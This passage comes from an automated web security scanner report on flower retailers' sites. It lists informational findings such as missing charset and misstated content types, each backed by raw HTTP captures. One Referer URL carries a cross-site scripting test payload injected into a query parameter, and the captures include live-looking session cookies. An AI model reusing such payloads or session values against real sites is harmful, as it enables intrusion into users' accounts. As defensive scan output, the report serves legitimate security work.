Referer: https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f25%2f2011&pid=30008396&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=293461
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:11 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253A%25253A%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:22:05 GMT
Content-Length: 49219


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...

22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

Request

GET /OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084 HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:52 GMT
Content-Length: 46799


<!doctype HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
   <head><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcdefault.css
...[SNIP]...

22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...

22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...

23. HTML does not specify charset
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


23.1. http://a1128.g.akamai.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 209
Expires: Mon, 09 May 2011 12:09:47 GMT
Date: Mon, 09 May 2011 12:09:47 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "&#47;favicon&#46;ico", is invalid.<p>
Reference&#32;&#35;9&#46;45f754b8&#46;1304942987&#46;21ee440e
</BODY
...[SNIP]...

23.2. http://adsfac.us/pct_mx.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adsfac.us
Path:   /pct_mx.asp

Request

GET /pct_mx.asp?L=305606&source=if HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1; FSESE002=pctc=31430&FQ=2&pctm=2&FM34983=1&FL311033=1&fpt=0%2C311033%2C109226%2C&pct%5Fdate=4143&FL109226=1&pctl=109226&FM31430=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 1475
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Mon, 09 May 2011 00:59:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title></title></head><body><IMG id="fd_pct_image0" name="fd_pct_image0" src="http://ad.trafficmp.com/a/bpix?adv=1657&id=1&r=
...[SNIP]...

23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media5.1800flowers.com
Path:   /800f_assets/jet/website/images/flowers/carousel.html

Request

GET /800f_assets/jet/website/images/flowers/carousel.html HTTP/1.1
Host: media5.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 05 Jan 2011 18:29:33 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Content-Type: text/html
Expires: Mon, 09 May 2011 01:00:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 01:00:48 GMT
Connection: close
Content-Length: 6228

<link type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/flowers/footer/carousel.css" rel="stylesheet">

<div style="margin:-10px 0 0 0; width:980px;height:90px;
...[SNIP]...

23.4. http://recs.richrelevance.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; catvhc=d-eF0-g9tZ-B---%%; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304903465735.null.59433447%7C82.1304903465735.null.15169998%7C

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.46
Date: Mon, 09 May 2011 12:11:23 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.46</center>
</body>
</html>
<!-- a padding to disable MSIE
...[SNIP]...

23.5. http://www.ftd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /

Request

GET / HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Content-Type: text/html
Date: Mon, 09 May 2011 01:00:16 GMT
X-Varnish: 729964464 729931173
Age: 611
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 134998


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

23.6. http://www.ftd.com/empty/index.epl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /empty/index.epl

Request

GET /empty/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Cache-Control: max-age=86400
Content-Type: text/html
Content-Length: 154
Date: Mon, 09 May 2011 01:00:35 GMT
X-Varnish: 729965568 728030311
Age: 32255
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>Empty Page</title></head>
<body>
<!-- empty page -->

</body>
</html>

23.7. http://www.ftd.com/empty/tealeaf.epl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Request

POST /empty/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
Content-Type: text/html
Content-Length: 164
Date: Mon, 09 May 2011 01:03:26 GMT
X-Varnish: 1301379237
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><title>TeaLeaf</title></head>
<body>
<!-- dummy page for tea leaf -->

</body>
</html>

24. Content type incorrectly stated
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dms.netmng.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u= HTTP/1.1
Host: dms.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=cb45f86e-c186-488a-9d0f-aec6be178ed4; evo5=z2r8aytrpwakd%7CMEacUnu%2BdlVAnlb0EJqADUPwdEWLwFVt1YkusdXa%2FyG4PDMmwT%2Bp04eahs%2BgOi%2BCY9F8sJ1N5rP7C5Tcb6%2BH1tPYzqeBSrsgO%2FIVnhaSvpJm5%2FDT0Ajp8kznUSNzkVywo4QxpKsftt8R5jf0pDOjFkH3uJy8CgNSN5gRv3ZgKClRVzaPtdufl67Wm9PuOAAQRJYlAbyAfeEbfybOFvnJNK26bhsFqut4RfCugAAIH9Thyf7tC%2FaFjZR6%2F4Xe3KWE9CjAfOduuB6WLWUvJbSzsEWNZmsH81p0aGPaG8iWRByF0XMlYG51oqOMDXV2iLvcha3GW5DrzVhwxSGnknALfg%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Connection: None
Content-Length: 1213
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8

window.onerror = function( ) { return true; }
var sirefurl = top.document.referrer;
var sipageurl = new String( top.document.URL );
if(sirefurl != ''){ if(sipageurl.split('/')[2] != sirefurl.split(
...[SNIP]...

24.2. http://sales.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=87011923 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=87011923
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:1a98"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 01:07:08 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

